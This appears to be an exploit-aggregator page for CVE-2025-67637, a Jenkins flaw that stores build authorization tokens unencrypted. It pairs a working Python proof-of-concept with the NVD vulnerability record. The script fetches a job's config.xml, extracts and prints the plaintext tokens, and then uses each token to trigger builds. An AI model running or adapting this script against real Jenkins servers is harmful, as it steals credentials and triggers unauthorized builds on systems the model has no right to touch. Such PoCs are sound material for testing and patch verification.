CVE-2025-67637

# CVE-2025-67637 PoC - Jenkins Build Authorization Token Extraction # This PoC demonstrates how to extract unencrypted build authorization tokens from Jenkins config.xml import requests from xml.etree import ElementTree as ET import sys def extract_jenkins_tokens(jenkins_url, job_name, username=None): """ Extract build authorization tokens from Jenkins job config.xml """ # Method 1: Via Jenkins Web Interface with Item/Extended Read permission config_url = f"{jenkins_url}/job/{job_name}/config.xml" headers = { 'Accept': 'application/xml' } if username: # Authenticate with username if required response = requests.get(config_url, headers=headers, auth=(username, '')) else: response = requests.get(config_url, headers=headers) if response.status_code == 200: # Parse XML to find authorization tokens root = ET.fromstring(response.content) # Jenkins stores tokens in <authorizationToken> tag tokens = [] for token in root.iter('authorizationToken'): if token.text: tokens.append(token.text) return tokens else: print(f"[-] Failed to access config.xml: HTTP {response.status_code}") return [] def trigger_build_with_token(jenkins_url, job_name, token): """ Trigger Jenkins build using extracted authorization token """ build_url = f"{jenkins_url}/job/{job_name}/build" params = { 'token': token } response = requests.post(build_url, params=params) if response.status_code in [200, 201, 302]: print(f"[+] Build triggered successfully with token") else: print(f"[-] Build trigger failed: HTTP {response.status_code}") # Example usage if __name__ == "__main__": jenkins_url = "http://jenkins-server:8080" job_name = "example-job" print(f"[*] Extracting tokens from {jenkins_url}/job/{job_name}/config.xml") tokens = extract_jenkins_tokens(jenkins_url, job_name) if tokens: print(f"[+] Found {len(tokens)} authorization token(s):") for i, token in enumerate(tokens, 1): print(f" Token {i}: {token}") # Attempt to trigger build trigger_build_with_token(jenkins_url, job_name, token) else: print("[-] No authorization tokens found")

{"cve": {"id": "CVE-2025-67637", "sourceIdentifier": "[email protected]", "published": "2025-12-10T17:15:56.180", "lastModified": "2025-12-17T17:39:11.063", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jenkins 2.540 and earlier, LTS 2.528.2 and earlier stores build authorization tokens unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Item/Extended Read permission or access to the Jenkins controller file system."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-312"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:*", "versionEndExcluding": "2.528.3", "matchCriteriaId": "A276E9FE-7CB8-4B6B-A399-14C0E7B10BC4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:jenkins:*:*:*:*:-:*:*:*", "versionEndExcluding": "2.541", "matchCriteriaId": "F2388D03-0340-4C73-97B7-FB06AB6E972B"}]}]}], "references": [{"url": "https://www.jenkins.io/security/advisory/2025-12-10/#SECURITY-783", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}